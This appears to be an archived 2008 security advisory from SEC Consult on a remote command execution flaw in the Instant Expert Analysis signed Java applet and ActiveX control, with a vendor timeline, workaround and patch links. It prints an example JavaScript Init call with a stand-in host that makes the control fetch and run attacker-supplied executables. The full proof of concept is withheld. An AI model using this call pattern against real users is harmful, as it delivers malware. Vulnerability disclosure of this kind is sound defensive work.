AOH :: HP Unsorted R :: VA1582.HTM

Remote command execution in Instant Expert Analysis



SEC Consult SA-20081016-0 :: Remote command execution in Instant Expert Analysis
SEC Consult SA-20081016-0 :: Remote command execution in Instant Expert Analysis



SEC Consult Security Advisory < 20081016-0 >
=======================================================================              title: Remote command execution in Instant Expert
                     Analysis signed Java applet and signed ActiveX
                     control
            program: Instant Expert Analysis
             vendor: Husdawg, LLC
             impact: Critical
homepage: http://www.systemrequirementslab.com 
              found: 2008-04-19
by: David Matscheko / SEC Consult / www.sec-consult.com 
=======================================================================
Vendor description:
-------------------

Instant Expert Analysis is a patent-pending technology that allows
websites to have a one-click method for rapidly analyzing a users
hardware and software.  The results are then instantaneously compared
to a comprehensive database of requirements.

Instant Expert Analysis has been proven effective by millions of
users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos,
CNET, IGN, and AMD.

[source: http://www.husdawg.com/systemrequirementslab/Home2.html] 


Vulnerability overview:
-----------------------

Instant Expert Analysis uses a signed Java applet for Firefox or
Netscape browsers and a signed ActiveX plugin for Internet Explorer.
Both applets allow an attacker to download and execute arbitrary
applications when the user visits an infected website.

If the user already accepted the applet on a valid site, no user
interaction is needed to perform this attack! Because the applets
are signed by a trustet source, the browsers default behavior is to
ask only the first time.


Vulnerability description:
--------------------------

The init method of the sysreqlab2.jar or the sysreqlab2.cab can be
called like the following example (from the Javascript):
document.SysReqLab.Init("http://www.example.com", "abc"); 

The applet then downloads and executes a dll file from
http://www.systemrequirementslab.com. 

The dll file loads a setup_abc.exe, a setup_mz_abc.exe, or a
setup_ie_abc.exe from the location that has been stated in the init
method (e.g. the attackers website) and executes it.


Proof of concept:
-----------------

The attacker can serve the following files from any host:
  setup_abc.exe
  setup_ie_abc.exe
  setup_mz_abc.exe
  sysreqlab2.cab
  sysreqlab2.jar
  exploit.html

The setup_*.exe files are the trojan applications.

== The full proof of concept has been removed from the public version of
this advisory. =

Vulnerable versions:
--------------------

No version information could be found for the affected files.


Vendor contact timeline:
------------------------

2008-05-08: Vulnerability information sent to vendor
(jhussey@husdawg.com) 
2008-06-20: We got informed that the main component has been updated,
            and a kill bit process has been initialized with Microsoft.
2008-08-13: Received E-Mail from vendor that a case has been opened by 
            Microsoft.
2008-10-13: SEC Consult requests an update from Husdawg on how 
            the killbit process is going and informs Husdawg that a    
            public advisory will be released on October 20th 2008.
2008-10-14: An US CERT vulnerability note is released, crediting Andre 
            Protas of eEye Digital Security and Greg Linares. SEC
            Consult has not been prenotified about the release and has
            not been credited by the vendor or other parties involved.
            

Workaround:
-----------

Block the ActiveX plugin from "Husdawg, LLC" and don't run it.

Remove the Certificate of the Java applet from "Husdawg, LLC" from
Control Panel / Java / Security / Certificates / Trusted Certificates
and don't allow the applet to run.

Patch:
------

An update is available from the vendor:

http://www.systemrequirementslab.com/bulletins/security_bulletin_1.html 

Additionally, the killbit for the affected ActiveX component has been
set by Microsoft:

http://www.microsoft.com/technet/security/advisory/956391.mspx 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com 

EOF David Matscheko / @2008


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.